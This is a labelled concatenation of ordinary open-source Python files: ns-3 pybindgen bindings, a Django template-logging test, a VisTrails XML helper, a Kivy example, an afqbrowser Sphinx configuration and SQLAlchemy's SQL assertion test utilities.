    """Register the ns3::TypeIdValue wrapper: constructors, virtual
    Copy/serialization overrides, and the Get/Set accessors.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
    cls.add_constructor([])
    ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
    ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
    cls.add_constructor([param('ns3::TypeId const &', 'value')])
    ## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
    cls.add_method('Copy',
                   'ns3::Ptr< ns3::AttributeValue >',
                   [],
                   is_const=True, is_virtual=True)
    ## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString',
                   'bool',
                   [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_virtual=True)
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
    cls.add_method('Get',
                   'ns3::TypeId',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString',
                   'std::string',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_const=True, is_virtual=True)
    ## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
    cls.add_method('Set',
                   'void',
                   [param('ns3::TypeId const &', 'value')])
    return
def register_Ns3HashImplementation_methods(root_module, cls):
    """Register the ns3::Hash::Implementation abstract base wrapper:
    constructors, GetHash32 (pure virtual), GetHash64 (virtual with a default),
    and clear().

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation(ns3::Hash::Implementation const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Hash::Implementation const &', 'arg0')])
    ## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation() [constructor]
    cls.add_constructor([])
    ## hash-function.h (module 'core'): uint32_t ns3::Hash::Implementation::GetHash32(char const * buffer, size_t const size) [member function]
    cls.add_method('GetHash32',
                   'uint32_t',
                   [param('char const *', 'buffer'), param('size_t const', 'size')],
                   is_pure_virtual=True, is_virtual=True)
    ## hash-function.h (module 'core'): uint64_t ns3::Hash::Implementation::GetHash64(char const * buffer, size_t const size) [member function]
    cls.add_method('GetHash64',
                   'uint64_t',
                   [param('char const *', 'buffer'), param('size_t const', 'size')],
                   is_virtual=True)
    ## hash-function.h (module 'core'): void ns3::Hash::Implementation::clear() [member function]
    cls.add_method('clear',
                   'void',
                   [],
                   is_pure_virtual=True, is_virtual=True)
    return
def register_Ns3HashFunctionFnv1a_methods(root_module, cls):
    """Register Python bindings for ns3::Hash::Function::Fnv1a
    (hash-fnv.h, module 'core')."""
    # Copy constructor, then the default constructor.
    cls.add_constructor([param('ns3::Hash::Function::Fnv1a const &', 'arg0')])
    cls.add_constructor([])
    # Both hash entry points are plain virtual overrides sharing the
    # (buffer, size) signature; register them in declaration order.
    for method_name, return_type in (('GetHash32', 'uint32_t'),
                                     ('GetHash64', 'uint64_t')):
        cls.add_method(method_name, return_type,
                       [param('char const *', 'buffer'),
                        param('size_t const', 'size')],
                       is_virtual=True)
    # void clear(): virtual override.
    cls.add_method('clear', 'void', [], is_virtual=True)
    return
def register_Ns3HashFunctionHash32_methods(root_module, cls):
    """Register Python bindings for ns3::Hash::Function::Hash32
    (hash-function.h, module 'core')."""
    # Constructors: copy constructor and the function-pointer wrapper.
    cls.add_constructor([param('ns3::Hash::Function::Hash32 const &', 'arg0')])
    cls.add_constructor([param('ns3::Hash::Hash32Function_ptr', 'hp')])
    # Only the 32-bit hash entry point is overridden by this wrapper.
    cls.add_method('GetHash32', 'uint32_t',
                   [param('char const *', 'buffer'),
                    param('size_t const', 'size')],
                   is_virtual=True)
    # void clear(): virtual override.
    cls.add_method('clear', 'void', [], is_virtual=True)
    return
def register_Ns3HashFunctionHash64_methods(root_module, cls):
    """Register Python bindings for ns3::Hash::Function::Hash64
    (hash-function.h, module 'core')."""
    # Constructors: copy constructor and the function-pointer wrapper.
    cls.add_constructor([param('ns3::Hash::Function::Hash64 const &', 'arg0')])
    cls.add_constructor([param('ns3::Hash::Hash64Function_ptr', 'hp')])
    # Both hash entry points are virtual overrides with the shared
    # (buffer, size) signature; register in declaration order.
    for method_name, return_type in (('GetHash32', 'uint32_t'),
                                     ('GetHash64', 'uint64_t')):
        cls.add_method(method_name, return_type,
                       [param('char const *', 'buffer'),
                        param('size_t const', 'size')],
                       is_virtual=True)
    # void clear(): virtual override.
    cls.add_method('clear', 'void', [], is_virtual=True)
    return
def register_Ns3HashFunctionMurmur3_methods(root_module, cls):
    """Register Python bindings for ns3::Hash::Function::Murmur3
    (hash-murmur3.h, module 'core')."""
    # Copy constructor, then the default constructor.
    cls.add_constructor([param('ns3::Hash::Function::Murmur3 const &', 'arg0')])
    cls.add_constructor([])
    # Both hash entry points are virtual overrides sharing the
    # (buffer, size) signature; register them in declaration order.
    for method_name, return_type in (('GetHash32', 'uint32_t'),
                                     ('GetHash64', 'uint64_t')):
        cls.add_method(method_name, return_type,
                       [param('char const *', 'buffer'),
                        param('size_t const', 'size')],
                       is_virtual=True)
    # void clear(): virtual override.
    cls.add_method('clear', 'void', [], is_virtual=True)
    return
def register_functions(root_module):
    """Dispatch free-function registration into each nested namespace
    submodule of the root ns3 module."""
    register_functions_ns3_FatalImpl(
        root_module.get_submodule('FatalImpl'), root_module)
    register_functions_ns3_Hash(
        root_module.get_submodule('Hash'), root_module)
    return
def register_functions_ns3_FatalImpl(module, root_module):
    # No free functions to register for the ns3::FatalImpl namespace.
    return
def register_functions_ns3_Hash(module, root_module):
    # Recurse into the nested ns3::Hash::Function namespace submodule.
    register_functions_ns3_Hash_Function(module.get_submodule('Function'), root_module)
    return
def register_functions_ns3_Hash_Function(module, root_module):
    # No free functions to register for the ns3::Hash::Function namespace.
    return
def main():
    # Build the full module description and emit the generated binding
    # code to stdout.
    out = FileCodeSink(sys.stdout)
    root_module = module_init()
    register_types(root_module)
    register_methods(root_module)
    register_functions(root_module)
    root_module.generate(out)

if __name__ == '__main__':
    main()
|
rsvip/Django | refs/heads/master | tests/template_tests/test_logging.py | 210 | from __future__ import unicode_literals
import logging
from django.template import Engine, Variable, VariableDoesNotExist
from django.test import SimpleTestCase
class TestHandler(logging.Handler):
    """Logging handler that simply remembers the most recent record
    passed to it, for later inspection by the tests."""

    def __init__(self):
        super(TestHandler, self).__init__()
        # Last LogRecord seen by emit(); None until something is logged.
        self.log_record = None

    def emit(self, record):
        # Overwrite rather than accumulate: tests only check the latest.
        self.log_record = record
class VariableResolveLoggingTests(SimpleTestCase):
    """Tests that failures while resolving a template ``Variable`` are
    logged to the ``django.template`` logger, and successes are not."""

    def setUp(self):
        # Capture records with a handler that stores the last record seen,
        # at DEBUG level so nothing is filtered out.
        self.test_handler = TestHandler()
        self.logger = logging.getLogger('django.template')
        self.original_level = self.logger.level
        self.logger.addHandler(self.test_handler)
        self.logger.setLevel(logging.DEBUG)

    def tearDown(self):
        # Restore the logger exactly as it was before the test.
        self.logger.removeHandler(self.test_handler)
        self.logger.level = self.original_level

    def test_log_on_variable_does_not_exist_silent(self):
        # TestObject stands in for a context object whose 'article'
        # attribute raises an exception flagged as a silent template
        # failure; resolution should not raise, but should still log.
        class TestObject(object):
            class SilentDoesNotExist(Exception):
                silent_variable_failure = True

            @property
            def template_name(self):
                return "template"

            @property
            def template(self):
                return Engine().from_string('')

            @property
            def article(self):
                raise TestObject.SilentDoesNotExist("Attribute does not exist.")

            def __iter__(self):
                return iter(attr for attr in dir(TestObject) if attr[:2] != "__")

            def __getitem__(self, item):
                return self.__dict__[item]

        Variable('article').resolve(TestObject())
        self.assertEqual(
            self.test_handler.log_record.msg,
            'template - Attribute does not exist.'
        )

    def test_log_on_variable_does_not_exist_not_silent(self):
        # A plain missing dict key is not silent: it raises AND logs.
        with self.assertRaises(VariableDoesNotExist):
            Variable('article.author').resolve({'article': {'section': 'News'}})
        self.assertEqual(
            self.test_handler.log_record.msg,
            'unknown - Failed lookup for key [author] in %r' %
            ("{%r: %r}" % ('section', 'News'), )
        )

    def test_no_log_when_variable_exists(self):
        # Successful resolution must leave the handler untouched.
        Variable('article.section').resolve({'article': {'section': 'News'}})
        self.assertIsNone(self.test_handler.log_record)
|
Nikea/VisTrails | refs/heads/master | vistrails/db/versions/v0_9_0/persistence/xml/xml_dao.py | 16 | ###############################################################################
##
## Copyright (C) 2011-2014, NYU-Poly.
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
from datetime import date, datetime
from vistrails.core.system import strftime, time_strptime
class XMLDAO:
    """Shared helpers for XML DAO classes: DOM attribute access and
    conversion between Python values and their XML string form."""

    def __init__(self):
        pass

    def hasAttribute(self, node, attr):
        """Return True when the DOM *node* carries attribute *attr*."""
        return node.hasAttribute(attr)

    def getAttribute(self, node, attr):
        """Return the value of attribute *attr* on *node*, or None when
        the attribute is absent."""
        try:
            found = node.attributes.get(attr)
            if found is not None:
                return found.value
        except KeyError:
            # Defensive: treat a failed lookup like a missing attribute.
            pass
        return None

    def convertFromStr(self, value, type):
        """Parse string *value* into the named *type*; return None for
        missing values, blank non-str values, or unknown type names."""
        if value is None:
            return None
        if type == 'str':
            return str(value)
        if value.strip() == '':
            return None
        if type == 'long':
            return long(value)  # Python 2 only; NameError on Python 3
        if type == 'float':
            return float(value)
        if type == 'int':
            return int(value)
        if type == 'date':
            return date(*time_strptime(value, '%Y-%m-%d')[0:3])
        if type == 'datetime':
            return datetime(*time_strptime(value, '%Y-%m-%d %H:%M:%S')[0:6])
        return None

    def convertToStr(self, value, type):
        """Serialize *value* for XML: ISO form for date/datetime, str()
        otherwise; '' when value is None."""
        if value is None:
            return ''
        if type == 'date':
            return value.isoformat()
        if type == 'datetime':
            return strftime(value, '%Y-%m-%d %H:%M:%S')
        return str(value)
|
cbenhagen/kivy | refs/heads/master | examples/includes/main.py | 40 | from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.button import Button
class SpecialButton(Button):
    """Button subclass; no behavior added on the Python side.

    Presumably customized via kv-language rules elsewhere -- confirm
    against the accompanying .kv files.
    """
    pass
class CustomLayout(BoxLayout):
    """BoxLayout subclass; no behavior added on the Python side.

    Presumably customized via kv-language rules elsewhere -- confirm
    against the accompanying .kv files.
    """
    pass
class TestApp(App):
    """Application class; relies entirely on Kivy's defaults (e.g. the
    conventional kv file lookup by app name)."""
    pass
if __name__ == '__main__':
    # Launch the Kivy app event loop when run as a script.
    TestApp().run()
|
yeatmanlab/AFQ-viz | refs/heads/master | doc/conf.py | 5 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# afqbrowser documentation build configuration file, created by
# sphinx-quickstart on Tue Apr 14 10:29:06 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# General information about the project.
project = 'afqbrowser'
copyright = '2017 -- , Jason Yeatman, Adam Richie-Halford, Josh Smith, Anisha Keshavan, Ariel Rokem, The University of Washington'
# Read __version__ by exec'ing the package's version.py.
# NOTE(review): exec on file contents assumes version.py is trusted
# (it is part of this repo); fine for Sphinx config.
currentdir = os.path.abspath(os.path.dirname(__file__))
ver_file = os.path.join(currentdir, '..', project, 'version.py')
with open(ver_file) as f:
    exec(f.read())
source_version = __version__  # __version__ is defined by the exec above
# NOTE(review): currentdir is recomputed below with the identical value
# as above; the duplicate is harmless.
currentdir = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(currentdir, 'tools'))
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../'))
# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.0'  # numpydoc requires sphinx >= 1.0

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
sys.path.append(os.path.abspath('sphinxext'))

extensions = ['sphinx.ext.autodoc',
              'sphinx.ext.doctest',
              'sphinx.ext.intersphinx',
              'sphinx.ext.todo',
              'sphinx.ext.coverage',
              'sphinx.ext.ifconfig',
              'sphinx.ext.autosummary',
              'sphinx.ext.mathjax',
              'math_dollar',  # has to go before numpydoc
              'numpydoc',
              'github',
              'sphinx_js']

# Add path to js directory for js auto-documentation
js_source_path = '../afqbrowser/site/client/js/'

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
# source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# --- Sphinx Gallery ---
sphinx_gallery_conf = {
    # To auto-generate example sections in the API
    'doc_module': ('afqbrowser',),
    # Auto-generated mini-galleries go here
    'backreferences_dir': 'gen_api'
}

# Automatically generate stub pages for API
autosummary_generate = True
autodoc_default_flags = ['members', 'inherited-members']
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# NOTE(review): version/release are hard-coded even though source_version
# is read from version.py above -- consider reusing it.

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']

# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []

# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'

# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = '_static/escience-logo.png'

# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
html_sidebars = {'**': ['globaltoc.html', 'searchbox.html']}

# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True
html_domain_indices = False

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'afqbrowserdoc'
# -- Options for LaTeX output ---------------------------------------------

latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #'papersize': 'letterpaper',

    # The font size ('10pt', '11pt' or '12pt').
    #'pointsize': '10pt',

    # Additional stuff for the LaTeX preamble.
    #'preamble': '',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    ('index', 'afqbrowser.tex', 'afqbrowser Documentation',
     'Ariel Rokem', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'afqbrowser', 'afqbrowser Documentation',
     ['Ariel Rokem'], 1)
]

# If true, show URL addresses after external links.
#man_show_urls = False

# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    ('index', 'afqbrowser', 'afqbrowser Documentation',
     'Ariel Rokem', 'afqbrowser', 'One line description of project.',
     'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
#texinfo_appendices = []

# If false, no module index is generated.
texinfo_domain_indices = False

# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'

# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False

# Example configuration for intersphinx: refer to the Python standard library.
# NOTE(review): newer Sphinx expects named keys, e.g.
# {'python': ('https://docs.python.org/3', None)}; this legacy form only
# works on old Sphinx -- confirm the Sphinx version in use.
intersphinx_mapping = {'http://docs.python.org/': None}
|
sandan/sqlalchemy | refs/heads/master | lib/sqlalchemy/testing/assertsql.py | 21 | # testing/assertsql.py
# Copyright (C) 2005-2016 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from ..engine.default import DefaultDialect
from .. import util
import re
import collections
import contextlib
from .. import event
from sqlalchemy.schema import _DDLCompiles
from sqlalchemy.engine.util import _distill_params
from sqlalchemy.engine import url
class AssertRule(object):
    """Base class for SQL assertion rules.

    Class-level defaults:
        is_consumed -- True once the rule has fully matched.
        errormessage -- failure description, or None while still matching.
        consume_statement -- whether the observed statement should be
            popped after this rule processes it.
    """

    is_consumed = False
    errormessage = None
    consume_statement = True

    def process_statement(self, execute_observed):
        """Examine one observed execution; subclasses override."""
        pass

    def no_more_statements(self):
        """Called when execution ends while this rule is still pending."""
        assert False, (
            'All statements are complete, but pending '
            'assertion rules remain')
class SQLMatchRule(AssertRule):
    """Marker base class for rules that match SQL statement text."""
    pass
class CursorSQL(SQLMatchRule):
    """Matches the exact string (and, when given, exact parameters) of
    the next DBAPI-level cursor statement."""

    # Cursor-level rules consume observed statements one at a time; this
    # flips to True only once every statement in the group has matched.
    consume_statement = False

    def __init__(self, statement, params=None):
        self.statement = statement
        self.params = params

    def process_statement(self, execute_observed):
        observed = execute_observed.statements[0]
        statement_matches = self.statement == observed.statement
        params_match = (
            self.params is None or self.params == observed.parameters)
        if statement_matches and params_match:
            execute_observed.statements.pop(0)
            self.is_consumed = True
            if not execute_observed.statements:
                self.consume_statement = True
        else:
            self.errormessage = \
                "Testing for exact SQL %s parameters %s received %s %s" % (
                    self.statement, self.params,
                    observed.statement, observed.parameters
                )
class CompiledSQL(SQLMatchRule):
    """Matches a Core/ORM-level statement after compiling it against a
    fixed comparison dialect (DefaultDialect unless ``dialect`` given).

    ``params`` may be a dict, a list of dicts, or a callable taking the
    execution context and returning either.
    """

    def __init__(self, statement, params=None, dialect='default'):
        self.statement = statement
        self.params = params
        self.dialect = dialect

    def _compare_sql(self, execute_observed, received_statement):
        # Newlines/tabs in the expected statement are cosmetic; strip
        # them before the exact-string comparison.
        stmt = re.sub(r'[\n\t]', '', self.statement)
        return received_statement == stmt

    def _compile_dialect(self, execute_observed):
        if self.dialect == 'default':
            return DefaultDialect()
        else:
            # ugh
            if self.dialect == 'postgresql':
                params = {'implicit_returning': True}
            else:
                params = {}
            return url.URL(self.dialect).get_dialect()(**params)

    def _received_statement(self, execute_observed):
        """reconstruct the statement and params in terms
        of a target dialect, which for CompiledSQL is just DefaultDialect."""
        context = execute_observed.context
        compare_dialect = self._compile_dialect(execute_observed)
        # DDL constructs compile without column/inline information.
        if isinstance(context.compiled.statement, _DDLCompiles):
            compiled = \
                context.compiled.statement.compile(
                    dialect=compare_dialect,
                    schema_translate_map=context.
                    execution_options.get('schema_translate_map'))
        else:
            compiled = (
                context.compiled.statement.compile(
                    dialect=compare_dialect,
                    column_keys=context.compiled.column_keys,
                    inline=context.compiled.inline,
                    schema_translate_map=context.
                    execution_options.get('schema_translate_map'))
            )
        _received_statement = re.sub(r'[\n\t]', '', util.text_type(compiled))
        parameters = execute_observed.parameters
        if not parameters:
            _received_parameters = [compiled.construct_params()]
        else:
            _received_parameters = [
                compiled.construct_params(m) for m in parameters]
        return _received_statement, _received_parameters

    def process_statement(self, execute_observed):
        context = execute_observed.context
        _received_statement, _received_parameters = \
            self._received_statement(execute_observed)
        params = self._all_params(context)
        equivalent = self._compare_sql(execute_observed, _received_statement)
        if equivalent:
            if params is not None:
                all_params = list(params)
                all_received = list(_received_parameters)
                # Greedy matching: every expected param set must find some
                # received set containing all of its key/value pairs.
                while all_params and all_received:
                    param = dict(all_params.pop(0))
                    for idx, received in enumerate(list(all_received)):
                        # do a positive compare only
                        for param_key in param:
                            # a key in param did not match current
                            # 'received'
                            if param_key not in received or \
                                    received[param_key] != param[param_key]:
                                break
                        else:
                            # all keys in param matched 'received';
                            # onto next param
                            del all_received[idx]
                            break
                    else:
                        # param did not match any entry
                        # in all_received
                        equivalent = False
                        break
                # Leftovers on either side mean the counts did not match.
                if all_params or all_received:
                    equivalent = False
        if equivalent:
            self.is_consumed = True
            self.errormessage = None
        else:
            self.errormessage = self._failure_message(params) % {
                'received_statement': _received_statement,
                'received_parameters': _received_parameters
            }

    def _all_params(self, context):
        # Normalize self.params into a list of dicts, resolving a
        # callable against the execution context first.
        if self.params:
            if util.callable(self.params):
                params = self.params(context)
            else:
                params = self.params
            if not isinstance(params, list):
                params = [params]
            return params
        else:
            return None

    def _failure_message(self, expected_params):
        # %% escapes survive the outer %-format so the caller can fill in
        # received_statement / received_parameters afterwards.
        return (
            'Testing for compiled statement %r partial params %r, '
            'received %%(received_statement)r with params '
            '%%(received_parameters)r' % (
                self.statement.replace('%', '%%'), expected_params
            )
        )
class RegexSQL(CompiledSQL):
    """CompiledSQL variant that matches the compiled statement against a
    regular expression instead of an exact string."""

    def __init__(self, regex, params=None):
        SQLMatchRule.__init__(self)
        # Keep both the compiled pattern (for matching) and the original
        # text (for failure messages).
        self.regex = re.compile(regex)
        self.orig_regex = regex
        self.params = params
        self.dialect = 'default'

    def _failure_message(self, expected_params):
        template = (
            'Testing for compiled statement ~%r partial params %r, '
            'received %%(received_statement)r with params '
            '%%(received_parameters)r'
        )
        return template % (self.orig_regex, expected_params)

    def _compare_sql(self, execute_observed, received_statement):
        # Anchored at the start only, per re.match semantics.
        return self.regex.match(received_statement) is not None
class DialectSQL(CompiledSQL):
    """CompiledSQL variant that compiles against the dialect actually in
    use and compares against the real cursor-level statements."""

    def _compile_dialect(self, execute_observed):
        return execute_observed.context.dialect

    def _compare_no_space(self, real_stmt, received_stmt):
        # Ignore newline/tab differences, matching CompiledSQL behavior.
        stmt = re.sub(r'[\n\t]', '', real_stmt)
        return received_stmt == stmt

    def _received_statement(self, execute_observed):
        received_stmt, received_params = super(DialectSQL, self).\
            _received_statement(execute_observed)
        # TODO: why do we need this part?
        for real_stmt in execute_observed.statements:
            if self._compare_no_space(real_stmt.statement, received_stmt):
                break
        else:
            raise AssertionError(
                "Can't locate compiled statement %r in list of "
                "statements actually invoked" % received_stmt)
        return received_stmt, execute_observed.context.compiled_parameters

    def _compare_sql(self, execute_observed, received_statement):
        stmt = re.sub(r'[\n\t]', '', self.statement)
        # convert our comparison statement to have the
        # paramstyle of the received
        paramstyle = execute_observed.context.dialect.paramstyle
        if paramstyle == 'pyformat':
            stmt = re.sub(
                r':([\w_]+)', r"%(\1)s", stmt)
        else:
            # positional params
            repl = None
            if paramstyle == 'qmark':
                repl = "?"
            elif paramstyle == 'format':
                repl = r"%s"
            elif paramstyle == 'numeric':
                repl = None
            # NOTE(review): repl stays None for 'numeric' (and unknown
            # styles), so re.sub below would raise TypeError -- numeric
            # paramstyle appears unsupported here; confirm upstream.
            stmt = re.sub(r':([\w_]+)', repl, stmt)
        return received_statement == stmt
class CountStatements(AssertRule):
    """Asserts that exactly *count* statements were executed, regardless
    of their content."""

    def __init__(self, count):
        self.count = count
        self._statement_count = 0

    def process_statement(self, execute_observed):
        # Every observed execution is simply tallied.
        self._statement_count += 1

    def no_more_statements(self):
        # Fail unless the tally matches the expected count exactly.
        matched = self.count == self._statement_count
        assert matched, 'desired statement count %d does not match %d' \
            % (self.count, self._statement_count)
class AllOf(AssertRule):
    """Matches once every one of the given rules has matched, in any
    order."""

    def __init__(self, *rules):
        self.rules = set(rules)

    def process_statement(self, execute_observed):
        for rule in list(self.rules):
            # Reset so a stale message from a prior statement does not
            # leak into this round.
            rule.errormessage = None
            rule.process_statement(execute_observed)
            if rule.is_consumed:
                self.rules.discard(rule)
                if not self.rules:
                    # every sub-rule has now matched
                    self.is_consumed = True
                break
            elif not rule.errormessage:
                # rule is not done yet
                self.errormessage = None
                break
        else:
            # No rule consumed or made progress; surface one failure.
            self.errormessage = list(self.rules)[0].errormessage
class Or(AllOf):
    """Matches as soon as any one of the given rules matches."""

    def process_statement(self, execute_observed):
        for candidate in self.rules:
            candidate.process_statement(execute_observed)
            if candidate.is_consumed:
                self.is_consumed = True
                return
        # Nothing matched; surface one of the sub-rule failures.
        self.errormessage = list(self.rules)[0].errormessage
class SQLExecuteObserved(object):
    """One logical Core execution: the original clause element plus all
    cursor-level statements it produced."""

    def __init__(self, context, clauseelement, multiparams, params):
        self.context = context
        self.clauseelement = clauseelement
        # Normalize the (multiparams, params) calling convention into a
        # flat list of parameter sets.
        self.parameters = _distill_params(multiparams, params)
        # DBAPI-level statements, appended by the cursor-execute hook.
        self.statements = []
class SQLCursorExecuteObserved(
    collections.namedtuple(
        "SQLCursorExecuteObserved",
        ["statement", "parameters", "context", "executemany"])
):
    """Immutable record of a single DBAPI cursor execution."""
    pass
class SQLAsserter(object):
    """Collects observed SQL executions and later checks them against a
    sequence of assertion rules."""

    def __init__(self):
        self.accumulated = []

    def _close(self):
        # Freeze what was accumulated; further accumulation is an error.
        self._final = self.accumulated
        del self.accumulated

    def assert_(self, *rules):
        pending_rules = list(rules)
        pending_statements = list(self._final)
        while pending_statements and pending_rules:
            current = pending_rules[0]
            current.process_statement(pending_statements[0])
            if current.is_consumed:
                pending_rules.pop(0)
            elif current.errormessage:
                assert False, current.errormessage
            if current.consume_statement:
                pending_statements.pop(0)
        # Either side left over is a failure.
        if pending_rules and not pending_statements:
            pending_rules[0].no_more_statements()
        elif pending_statements and not pending_rules:
            assert False, "Additional SQL statements remain"
